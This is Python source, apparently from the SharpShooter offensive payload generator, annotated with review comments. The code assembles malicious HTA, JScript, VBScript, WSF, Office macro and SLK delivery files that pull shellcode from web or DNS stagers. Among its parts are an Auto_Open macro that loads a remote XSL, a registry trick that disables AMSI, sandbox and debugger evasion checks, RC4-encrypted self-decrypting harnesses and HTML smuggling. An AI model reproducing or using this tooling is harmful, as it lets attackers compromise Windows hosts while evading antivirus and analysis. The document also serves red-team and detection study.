        """Gzip `string_` into an in-memory BytesIO and return that buffer.

        Returns the BytesIO object itself (the caller uses .getvalue()), not
        bytes. The bare except silently ignores any failure of .encode(), so a
        Python 2 str holding non-ASCII bytes is written as-is instead of
        raising.
        """
        fgz = BytesIO()
        try:
            string_ = string_.encode()
        except:
            pass

        gzip_obj = gzip.GzipFile(mode='wb', fileobj=fgz)
        gzip_obj.write(string_)
        gzip_obj.close()
        return fgz

    def rc4(self, key, data):
        """RC4 `data` (str) with `key` (str) and return the result as a str.

        Textbook RC4: key-scheduling pass, then the keystream generator with
        one keystream byte XORed per input character. The operation is
        symmetric, so the same call decrypts. `range(256)` is indexed and
        mutated in place, which only works on Python 2 where it is a list.
        """
        S = range(256)
        j = 0
        out = []

        # Key-scheduling algorithm: permute S under the key.
        for i in range(256):
            j = (j + S[i] + ord(key[i % len(key)])) % 256
            S[i], S[j] = S[j], S[i]

        # Keystream generation: one output byte per input byte.
        i = j = 0
        for char in data:
            i = (i + 1) % 256
            j = (j + S[i]) % 256
            S[i], S[j] = S[j], S[i]
            out.append(chr(ord(char) ^ S[(S[i] + S[j]) % 256]))

        return ''.join(out)

    def run(self, args):
        """Build the output file(s) described by the parsed `args`.

        Picks a template under templates/ from args.payload / args.dotnetver /
        args.stageless, substitutes the %SANDBOX_ESCAPES%, %DELIVERY% (or
        %SHELLCODE64%) placeholders and an optional AMSI stub, RC4-encrypts
        the result with a random key, wraps it in the matching harness
        template and writes output/<args.output>.<file_type>.

        Side effects: writes one or more files under output/ (the delivery
        file, optionally <output>.payload, .xsl/.sct and .html), prints
        progress lines, and calls sys.exit(-1) if the delivery block raises.
        Attributes of `args` read here: payload, amsi, awlurl, dotnetver,
        stageless, comtechnique, sandbox, delivery, shellcode, shellcode_file,
        rawscfile, refs, namespace, entrypoint, web, dns, output,
        awltechnique, smuggle, template. Returns None.
        """

        template_body = ""
        template_base = "templates/sharpshooter."
        shellcode_delivery = False
        shellcode_gzip = ""
        payload_type = 0

        # VBA stub: loads the XSL document at args.awlurl through
        # Microsoft.XMLDOM and applies it with transformNode.
        macro_template = """ Set XML = CreateObject("Microsoft.XMLDOM")
XML.async = False
Set xsl = XML
xsl.Load "%s"
XML.transformNode xsl""" % (args.awlurl)

        # Wraps macro_template: reads HKCU\...\Windows Script\Settings\AmsiEnable,
        # writes 0 (REG_DWORD) when the value is non-zero or missing, runs the
        # stub, then writes 1 back. Both registry writes happen on the host
        # that runs the macro and are visible to monitoring.
        macro_amsi_stub = """ regpath = "HKCU\Software\Microsoft\Windows Script\Settings\AmsiEnable"
Set oWSS = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8")
e = 0
On Error Resume Next
r = oWSS.RegRead(regpath)
If r <> 0 Then
oWSS.RegWrite regpath, "0", "REG_DWORD"
e = 1
End If

If Err.Number <> 0 Then
oWSS.RegWrite regpath, "0", "REG_DWORD"
e = 1
Err.Clear
End If

%s

If e Then
oWSS.RegWrite regpath, "1", "REG_DWORD"
End If

On Error GoTo 0""" % (macro_template)

        macro_stager = """Sub Auto_Open()
%MACRO_CODE%
End Sub"""

        # Only the "macro" payload type honours args.amsi through this stub;
        # every other type goes through amsikiller.amsi_stub() further down.
        if(args.amsi and args.payload=="macro"):
            macro_stager = macro_stager.replace("%MACRO_CODE%", macro_amsi_stub)
        else:
            macro_stager = macro_stager.replace("%MACRO_CODE%", macro_template)

        dotnet_version = 1
        # NOTE(review): stageless_payload is never set to True anywhere in this
        # method, so every `stageless_payload is True` / `not stageless_payload`
        # test below is constant; only args.stageless actually matters.
        stageless_payload = False

        if not args.payload=="slk":
            dotnet_version = int(args.dotnetver)

        # Template family: stageless vs. staged, v2 vs. v4 .NET.
        if((args.stageless or stageless_payload is True) and dotnet_version == 2):
            template_base = "templates/stageless."
        elif((args.stageless or stageless_payload is True) and dotnet_version == 4):
            template_base = "templates/stagelessv4."
        elif(dotnet_version == 4):
            template_base = "templates/sharpshooterv4."

        #print(template_base)

        if(args.payload == "hta"):
            payload_type = 1
        elif(args.payload == "js"):
            payload_type = 2
        elif(args.payload == "jse"):
            payload_type = 3
        elif(args.payload == "vba"):
            payload_type = 4
        elif(args.payload == "vbe"):
            payload_type = 5
        elif(args.payload == "vbs"):
            payload_type = 6
        elif(args.payload == "wsf"):
            payload_type = 7
        elif(args.payload == "macro"):
            payload_type = 8
        elif(args.payload == "slk"):
            payload_type = 9

        # Load the template body and fix the output extension (file_type).
        # NOTE(review): on an invalid payload type, or for "vba", only a
        # message is printed and execution continues with file_type unbound,
        # so the later `outputfile + "." + file_type` raises NameError rather
        # than exiting cleanly here.
        try:
            payload_type = int(payload_type)
            if (payload_type < 1 or payload_type > 9):
                raise Exception

            if(payload_type == 1):
                if(args.comtechnique):
                    template_body = self.read_file(template_base + "js")
                else:
                    template_body = self.read_file(template_base + "vbs")
                file_type = "hta"
            elif(payload_type == 2):
                template_body = self.read_file(template_base + "js")
                file_type = "js"
            elif(payload_type == 3):
                template_body = self.read_file(template_base + "js")
                file_type = "js"
            elif(payload_type == 4):
                print("\n\033[93m[!]\033[0;0m VBA support is still under development")
                raise Exception
                #template_body = read_file(template_base + "vba")
                #file_type = "vba"
            elif(payload_type == 5):
                if(args.comtechnique):
                    template_body = self.read_file(template_base + "js")
                else:
                    template_body = self.read_file(template_base + "vbs")
                file_type = "vbs"
            elif(payload_type == 6):
                if(args.comtechnique):
                    template_body = self.read_file(template_base + "js")
                else:
                    template_body = self.read_file(template_base + "vbs")
                file_type = "vbs"
            elif(payload_type == 7):
                template_body = self.read_file(template_base + "js")
                file_type = "wsf"
            elif(payload_type == 8):
                template_body = self.read_file(template_base + "js")
                file_type = "macro"
            elif(payload_type == 9):
                file_type = "slk"
        except Exception as e:
            print("\n\033[1;31m[!]\033[0;0m Incorrect choice")

        # Sandbox checks: args.sandbox is a comma-separated list of technique
        # ids 1-5, where id 1 carries a domain as "1=<domain>". Each iteration
        # pops one id; an empty list yields "0", which ends the loop. An
        # unknown id only prints "Incorrect choice" and moves on.
        sandbox_techniques=""
        techniques_list = []
        sandboxevasion_type = 0

        if(args.sandbox):
            techniques_list = args.sandbox.split(",")

        while True:
            if(techniques_list):
                sandboxevasion_type = techniques_list[0]
                techniques_list.remove(techniques_list[0])
                if not sandboxevasion_type:
                    sandboxevasion_type = "0"
            else:
                sandboxevasion_type = "0"

            try:
                # Substring test, not equality: any id containing "1" is split
                # on "=" here (an entry without "=" raises IndexError below).
                if("1" in sandboxevasion_type):
                    domainkey = sandboxevasion_type.split("=")
                    domain_name = domainkey[1]
                    sandboxevasion_type = domainkey[0]

                sandboxevasion_type = int(sandboxevasion_type)
                if sandboxevasion_type > 5: raise Exception

                # JScript templates take "o.CheckPlease(n, ...)" call syntax;
                # the VBScript ones take the bare "o.CheckPlease n, ..." form.
                if (sandboxevasion_type == 1):
                    domain_name = domain_name.strip()

                    if not domain_name: raise Exception

                    if len(domain_name) <= 1:
                        raise Exception
                    else:
                        print("\033[1;34m[*]\033[0;0m Adding keying for %s domain" % (domain_name))
                        if("js" in file_type or args.comtechnique):
                            sandbox_techniques += "\to.CheckPlease(0, \"%s\")\n" % domain_name
                        else:
                            sandbox_techniques += "o.CheckPlease 0, \"%s\"\n" % domain_name
                    continue
                elif(sandboxevasion_type == 2):
                    print("\033[1;34m[*]\033[0;0m Keying to domain joined systems")
                    if("js" in file_type or args.comtechnique):
                        sandbox_techniques += "\to.CheckPlease(1,\"foo\")\n"
                    else:
                        sandbox_techniques += "o.CheckPlease 1, \"foo\"\n"
                    continue
                elif(sandboxevasion_type == 3):
                    print("\033[1;34m[*]\033[0;0m Avoiding sandbox artifacts")

                    if("js" in file_type or args.comtechnique):
                        sandbox_techniques += "\to.CheckPlease(2,\"foo\")\n"
                    else:
                        sandbox_techniques += "o.CheckPlease 2,\"foo\"\n"
                    continue
                elif(sandboxevasion_type == 4):
                    print("\033[1;34m[*]\033[0;0m Avoiding bad MACs")

                    if("js" in file_type or args.comtechnique):
                        sandbox_techniques += "\to.CheckPlease(3,\"foo\")\n"
                    else:
                        sandbox_techniques += "o.CheckPlease 3,\"foo\"\n"
                    continue
                elif(sandboxevasion_type == 5):
                    print("\033[1;34m[*]\033[0;0m Avoiding debugging")

                    if("js" in file_type or args.comtechnique):
                        sandbox_techniques += "\to.CheckPlease(4,\"foo\")\n"
                    else:
                        sandbox_techniques += "o.CheckPlease 4,\"foo\"\n"
                    continue
                elif(sandboxevasion_type == 0):
                    break

            except Exception as e:
                print("\n\033[1;31m[!]\033[0;0m Incorrect choice")

        template_code = template_body.replace("%SANDBOX_ESCAPES%", sandbox_techniques)

        # Delivery block. The `while True` runs exactly once: the try ends in
        # `break` and the except calls sys.exit(-1). args.delivery maps to
        # 1 = web, 2 = dns, anything else = 3 (both).
        delivery_method = "1"
        encoded_sc = ""
        while True:

            if(args.delivery == "web"):
                delivery_method = "1"
            elif args.delivery == "dns":
                delivery_method = "2"
            else:
                delivery_method = "3"

            try:
                delivery_method = int(delivery_method)

                # shellcode_payload is derived from the boolean args.shellcode
                # only; the "yes" comparison below can never match.
                if args.shellcode:
                    shellcode_payload = "y"
                else:
                    shellcode_payload = "n"

                shellcode_payload = shellcode_payload.lower()
                if (shellcode_payload == "y" or shellcode_payload == "yes"):
                    # Staged shellcode: embed the shellcode file into the C#
                    # template and gzip it; it is written separately as
                    # <output>.payload at the end of this method.
                    shellcode_delivery = True
                    shellcode_template = self.read_file("templates/shellcode.cs")

                    shellcode = []

                    sc = self.read_file(args.shellcode_file)
                    shellcode.append(sc)

                    shellcode = "\n".join(shellcode)

                    shellcode_final = shellcode_template.replace("%SHELLCODE%", shellcode)
                    shellcode_gzip = self.gzip_str(shellcode_final)

                elif (args.stageless or stageless_payload is True):
                    # Stageless: base64 of the raw shellcode file goes straight
                    # into the template.
                    rawsc = self.read_file(args.rawscfile)
                    encoded_sc = base64.b64encode(rawsc)
                    #if("vbs" in file_type or "hta" in file_type):
                    #    sc_split = [encoded_sc[i:i+100] for i in range(0, len(encoded_sc), 100)]
                    #    for i in sc_split:
                    #else:
                    template_code = template_code.replace("%SHELLCODE64%", encoded_sc)

                else:
                    refs = args.refs
                    namespace = args.namespace
                    entrypoint = args.entrypoint

                if (shellcode_delivery):
                    refs = "mscorlib.dll"
                    namespace = "ShellcodeInjection.Program"
                    entrypoint = "Main"

                # NOTE(review): refs/namespace/entrypoint are only bound in the
                # non-stageless branches above, so args.stageless combined with
                # --delivery web or dns reaches the substitutions below with
                # them unbound: NameError, caught by the except, exit(-1).
                # Only the "both" case (3) explicitly excludes args.stageless.
                if(delivery_method == 1 and not stageless_payload):
                    stager = args.web

                    if("js" in file_type or "wsf" in file_type or args.comtechnique):
                        template_code = template_code.replace("%DELIVERY%", "o.Go(\"%s\", \"%s\", \"%s\", 1, \"%s\");" % (refs, namespace, entrypoint, stager))
                    else:
                        template_code = template_code.replace("%DELIVERY%", "o.Go \"%s\", \"%s\", \"%s\", 1, \"%s\"" % (refs, namespace, entrypoint, stager))

                if(delivery_method == 2 and not stageless_payload):
                    stager = args.dns

                    if("js" in file_type or "wsf" in file_type or args.comtechnique):
                        template_code = template_code.replace("%DELIVERY%", "\to.Go(\"%s\", \"%s\", \"%s\", 2, \"%s\");" % (refs, namespace, entrypoint, stager))
                    else:
                        template_code = template_code.replace("%DELIVERY%", "\to.Go \"%s\", \"%s\", \"%s\", 2, \"%s\"" % (refs, namespace, entrypoint, stager))

                if((delivery_method == 3) and (not args.stageless) and (not stageless_payload)):
                    stager = args.web

                    if("js" in file_type or "wsf" in file_type or args.comtechnique):
                        webdelivery = "\to.Go(\"%s\", \"%s\", \"%s\", 1, \"%s\");\n" % (refs, namespace, entrypoint, stager)
                    else:
                        webdelivery = "\to.Go \"%s\", \"%s\", \"%s\", 1, \"%s\"\n" % (refs, namespace, entrypoint, stager)

                    stager = args.dns

                    if("js" in file_type or "wsf" in file_type or args.comtechnique):
                        dnsdelivery = "\to.Go(\"%s\", \"%s\", \"%s\", 2, \"%s\");" % (refs, namespace, entrypoint, stager)
                    else:
                        dnsdelivery = "\to.Go \"%s\", \"%s\", \"%s\", 2, \"%s\"" % (refs, namespace, entrypoint, stager)

                    deliverycode = webdelivery + dnsdelivery
                    template_code = template_code.replace("%DELIVERY%", deliverycode)

                break
            except Exception as e:
                print(e)
                print("\n\033[1;31m[!]\033[0;0m Incorrect choice")
                sys.exit(-1)

        amsi_bypass = ""
        outputfile = args.output
        outputfile_payload = outputfile + "." + file_type

        # Non-macro AMSI handling is delegated to amsikiller.amsi_stub(); the
        # closing "}" / "On Error Goto 0 / End If" balances the block that the
        # stub is assumed to open (its text is not visible in this file).
        if args.amsi and not args.payload == "macro":
            if(args.comtechnique):
                amsi_bypass = amsikiller.amsi_stub("js", args.amsi, outputfile_payload)
                template_code = amsi_bypass + template_code + "}"
            else:
                amsi_bypass = amsikiller.amsi_stub(file_type, args.amsi, outputfile_payload)

                if "vb" in file_type or "hta" in file_type:
                    template_code = amsi_bypass + template_code + "\nOn Error Goto 0\nEnd If"
                else:
                    template_code = amsi_bypass + template_code + "}"

        #print(template_code)

        # RC4 + base64 the filled template; the key is written into the
        # harness as %KEY%, so the output is self-decrypting.
        key = self.rand_key(10)
        payload_encrypted = self.rc4(key, template_code)
        payload_encoded = base64.b64encode(payload_encrypted)

        awl_payload_simple = ""

        # Wrap in the per-format harness. JS-family outputs are run through
        # jsmin; the VBS harness is written as-is. For "macro" file_type none
        # of the earlier branches match, so it falls through to the VBS case.
        if("js" in file_type or args.comtechnique):
            harness = self.read_file("templates/harness.js")
            payload = harness.replace("%B64PAYLOAD%", payload_encoded)
            payload = payload.replace("%KEY%", "'%s'" % (key))
            payload_minified = jsmin(payload)
            awl_payload_simple = template_code
        elif("wsf" in file_type):
            harness = self.read_file("templates/harness.wsf")
            payload = harness.replace("%B64PAYLOAD%", payload_encoded)
            payload = payload.replace("%KEY%", "'%s'" % (key))
            payload_minified = jsmin(payload)
        elif("hta" in file_type):
            harness = self.read_file("templates/harness.hta")
            payload = harness.replace("%B64PAYLOAD%", payload_encoded)
            payload = payload.replace("%KEY%", "'%s'" % (key))
            payload_minified = jsmin(payload)
        elif("vba" in file_type):
            harness = self.read_file("templates/harness.vba")
            payload = harness.replace("%B64PAYLOAD%", payload_encoded)
            payload = payload.replace("%KEY%", "\"%s\"" % (key))
            payload_minified = jsmin(payload)
        elif("slk" in file_type):
            pass
        else:
            harness = self.read_file("templates/harness.vbs")
            payload = harness.replace("%B64PAYLOAD%", payload_encoded)
            payload = payload.replace("%KEY%", "\"%s\"" % (key))

        # The encoded variants only differ in extension at this point;
        # outputfile_payload was already built above from the pre-rename
        # file_type, so the written file keeps the .js / .vbs name.
        if (payload_type == 3):
            file_type = "jse"
        elif (payload_type == 5):
            file_type = "vbe"

        # NOTE(review): plain open() without with/try; an exception between
        # here and f.close() leaks the handle and may leave a partial file.
        f = open("output/" + outputfile_payload, 'w')
        #print(payload)
        if(payload_type == 8):
            f.write(macro_stager)

        if(payload_type == 9):
            payload = excel4.generate_slk(args.rawscfile)

        if(args.comtechnique):
            # COM-technique output: a second file (.xsl for wmic / unset,
            # .sct otherwise) is produced by awl.create_com_stager().
            if not args.awltechnique or args.awltechnique == "wmic":
                payload_file = "output/" + outputfile + ".xsl"
            else:
                payload_file = "output/" + outputfile + ".sct"

            #if("js" in file_type or "hta" in file_type or "wsf" in file_type):
            awl_payload = awl.create_com_stager(args.comtechnique, file_type, args.awlurl, payload_file, awl_payload_simple, args.amsi)
            #else:
            #    awl_payload = awl.create_com_stager(args.comtechnique, file_type, args.awlurl, payload_file, payload)
            f.write(awl_payload)
        elif("js" in file_type or "hta" in file_type or "wsf" in file_type):
            f.write(payload_minified)
        else:
            f.write(payload)
        f.close()

        print("\033[1;34m[*]\033[0;0m Written delivery payload to output/%s" % outputfile_payload)
        if shellcode_delivery:
            # Second artefact: base64 of the gzipped C# source from above.
            outputfile_shellcode = outputfile + ".payload"
            with open("output/" + outputfile_shellcode, 'w') as f:
                gzip_encoded = base64.b64encode(shellcode_gzip.getvalue())
                f.write(gzip_encoded)
                f.close()  # redundant inside the with block
            print("\033[1;34m[*]\033[0;0m Written shellcode payload to output/%s" % outputfile_shellcode)

        # Optional HTML wrapper around the written file; uses a fresh key,
        # independent of the RC4 key above.
        if "vba" not in file_type:
            if (args.smuggle):
                key = self.rand_key(10)
                template = ""
                template = args.template
                embedinhtml.run_embedInHtml(key, "./output/" + outputfile_payload, "./output/" + outputfile + ".html", template)
# Entry point: parse/validate arguments, then generate the output.
if __name__ == "__main__":
    ss = SharpShooter()
    args = ss.validate_args()
    ss.run(args)